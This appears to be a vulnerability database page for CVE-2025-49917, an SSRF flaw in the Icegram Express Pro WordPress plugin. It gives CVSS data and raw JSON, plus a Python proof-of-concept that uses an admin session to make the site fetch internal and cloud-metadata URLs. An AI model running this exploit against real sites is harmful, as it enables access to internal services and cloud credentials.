Security Vulnerability Report
中文
CVE-2025-49917 CVSS 4.4 MEDIUM

CVE-2025-49917

Published: 2025-10-22 15:15:38
Last Modified: 2026-04-15 00:35:42

Description

Server-Side Request Forgery (SSRF) vulnerability in Icegram Icegram Express Pro email-subscribers-premium allows Server Side Request Forgery.This issue affects Icegram Express Pro: from n/a through <= 5.9.5.

CVSS Details

CVSS Score
4.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Icegram Express Pro <= 5.9.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-49917 - Icegram Express Pro SSRF PoC # Vulnerability: Server-Side Request Forgery in email-subscribers-premium <= 5.9.5 # Requires: High privilege (admin or editor level access) import requests from urllib.parse import urljoin class IcegramSSRF: def __init__(self, target_url, cookies): self.target_url = target_url.rstrip('/') self.session = requests.Session() self.session.cookies.update(cookies) self.ajax_url = urljoin(self.target_url, '/wp-admin/admin-ajax.php') def exploit_ssrf(self, target_internal_url): """ Exploit SSRF via Icegram Express Pro plugin target_internal_url: Internal URL to access (e.g., http://127.0.0.1, http://169.254.169.254) """ # Payload targeting the vulnerable endpoint payload = { 'action': 'es_preview_email', 'url': target_internal_url, 'es_type': 'preview' } try: response = self.session.post( self.ajax_url, data=payload, timeout=10 ) return { 'status': response.status_code, 'content': response.text[:500] if response.text else 'No content', 'url': target_internal_url } except Exception as e: return {'error': str(e), 'url': target_internal_url} # Usage example: # cookies = {'wordpress_logged_in_xxx': 'admin_session_cookie'} # exploit = IcegramSSRF('http://target-wordpress-site.com', cookies) # result = exploit.exploit_ssrf('http://169.254.169.254/latest/meta-data/') # print(result)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-49917", "sourceIdentifier": "[email protected]", "published": "2025-10-22T15:15:37.693", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Server-Side Request Forgery (SSRF) vulnerability in Icegram Icegram Express Pro email-subscribers-premium allows Server Side Request Forgery.This issue affects Icegram Express Pro: from n/a through <= 5.9.5."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N", "baseScore": 4.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/email-subscribers-premium/vulnerability/wordpress-icegram-express-pro-plugin-5-9-5-server-side-request-forgery-ssrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}